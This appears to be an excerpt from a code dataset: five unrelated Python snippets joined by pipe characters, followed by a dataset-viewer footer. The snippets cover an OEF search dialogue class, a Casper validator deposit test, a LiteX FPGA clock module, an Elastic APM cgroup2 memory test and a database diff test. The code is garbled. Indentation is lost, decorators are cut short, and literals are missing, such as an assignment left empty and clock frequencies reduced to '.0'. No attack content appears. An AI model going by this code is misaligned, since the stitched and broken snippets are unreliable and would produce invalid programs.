def __init__(self, dialogue_label: DialogueLabel, self_address: Address, role: Dialogue.Role, message_class: Type[OefSearchMessage]=OefSearchMessage) -> None:
BaseOefSearchDialogue.__init__(self, dialogue_label=dialogue_label, self_address=self_address, role=role, message_class=message_class)
self._is_seller_search = None
def is_seller_search(self) -> bool:
if (self._is_seller_search is None):
raise ValueError('is_seller_search not set!')
return self._is_seller_search
_seller_search.setter
def is_seller_search(self, is_seller_search: bool) -> None:
enforce((self._is_seller_search is None), 'is_seller_search already set!')
self._is_seller_search = is_seller_search |
def test_deposit_sets_end_dynasty(concise_casper, funded_account, validation_key, deposit_amount, deposit_validator):
validator_index = deposit_validator(funded_account, validation_key, deposit_amount)
expected_end_dynasty =
assert (concise_casper.validators__end_dynasty(validator_index) == expected_end_dynasty) |
class _CRG(Module, AutoCSR):
def __init__(self, platform, sys_clk_freq):
self.rst = Signal()
self.clock_domains.cd_sys_pll = ClockDomain()
self.clock_domains.cd_sys = ClockDomain()
self.clock_domains.cd_sys4x = ClockDomain(reset_less=True)
self.clock_domains.cd_clk200 = ClockDomain()
self.clock_domains.cd_uart = ClockDomain()
self.submodules.main_pll = main_pll = S7PLL(speedgrade=(- 2))
self.comb += main_pll.reset.eq(platform.request('cpu_reset'))
main_pll.register_clkin(platform.request('clk200'), .0)
main_pll.create_clkout(self.cd_sys_pll, sys_clk_freq)
main_pll.create_clkout(self.cd_clk200, .0)
main_pll.create_clkout(self.cd_uart, .0)
main_pll.expose_drp()
self.submodules.idelayctrl = S7IDELAYCTRL(self.cd_clk200)
self.submodules.pll = pll = S7PLL(speedgrade=(- 2))
self.comb += pll.reset.eq(((~ main_pll.locked) | self.rst))
pll.register_clkin(self.cd_sys_pll.clk, sys_clk_freq)
pll.create_clkout(self.cd_sys, sys_clk_freq)
pll.create_clkout(self.cd_sys4x, (4 * sys_clk_freq))
self.sys_clk_counter = CSRStatus(32)
self.sync += self.sys_clk_counter.status.eq((self.sys_clk_counter.status + 1)) |
def test_mem_from_cgroup2_max_handling(elasticapm_client, tmpdir):
proc_stat_self = os.path.join(tmpdir.strpath, 'self-stat')
proc_stat = os.path.join(tmpdir.strpath, 'stat')
proc_meminfo = os.path.join(tmpdir.strpath, 'meminfo')
cgroup2_memory_limit = os.path.join(tmpdir.strpath, 'slice', 'memory.max')
cgroup2_memory_usage = os.path.join(tmpdir.strpath, 'slice', 'memory.current')
cgroup2_memory_stat = os.path.join(tmpdir.strpath, 'slice', 'memory.stat')
cgroup2_self_cgroup = os.path.join(tmpdir.strpath, 'cgroup')
proc_self_cgroup = os.path.join(tmpdir.strpath, 'cgroup')
os.mkdir(os.path.join(tmpdir.strpath, 'slice'))
proc_self_mount = os.path.join(tmpdir.strpath, 'mountinfo')
for (path, content) in ((proc_stat, TEMPLATE_PROC_STAT_DEBIAN.format(user=0, idle=0)), (proc_stat_self, TEMPLATE_PROC_STAT_SELF.format(utime=0, stime=0)), (proc_meminfo, TEMPLATE_PROC_MEMINFO), (cgroup2_memory_limit, 'max'), (cgroup2_memory_usage, TEMPLATE_CGROUP_MEM_USAGE_IN_BYTES), (cgroup2_memory_stat, TEMPLATE_CGROUP_MEM_STAT), (cgroup2_self_cgroup, '9:memory:/slice'), (proc_self_mount, (('30 23 0:26 / ' + tmpdir.strpath) + ' rw,nosuid,nodev,noexec,relatime shared:4 - cgroup2 cgroup rw,seclabel\n'))):
with open(path, mode='w') as f:
f.write(content)
metricset = CPUMetricSet(MetricsRegistry(elasticapm_client), sys_stats_file=proc_stat, process_stats_file=proc_stat_self, memory_stats_file=proc_meminfo, proc_self_cgroup=proc_self_cgroup, mount_info=proc_self_mount)
data = next(metricset.collect())
assert ('system.process.cgroup.memory.mem.limit.bytes' not in data['samples'])
assert ('system.process.cgroup.memory.mem.usage.bytes' not in data['samples']) |
.parametrize('series_of_diffs, expected_updates, expected_deletions', (((), {}, []), (({}, {}), {}, []), (({b'1': b'1'}, {b'1': None}), {}, [b'1']), (({b'1': b'1'}, {b'1': b'2'}), {b'1': b'2'}, []), (({b'1': None},), {}, [b'1']), (({b'2': b'3'},), {b'2': b'3'}, [])))
def test_db_diff_inspection(series_of_diffs, expected_updates, expected_deletions):
diffs = []
for changes in series_of_diffs:
tracker = DBDiffTracker()
for (key, val) in changes.items():
if (val is None):
del tracker[key]
else:
tracker[key] = val
diffs.append(tracker.diff())
actual_diff = DBDiff.join(diffs)
if expected_updates:
(expected_keys, _) = zip(*expected_updates.items())
else:
expected_keys = ()
assert (actual_diff.pending_keys() == expected_keys)
assert (actual_diff.pending_items() == tuple(expected_updates.items()))
assert (actual_diff.deleted_keys() == tuple(expected_deletions)) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.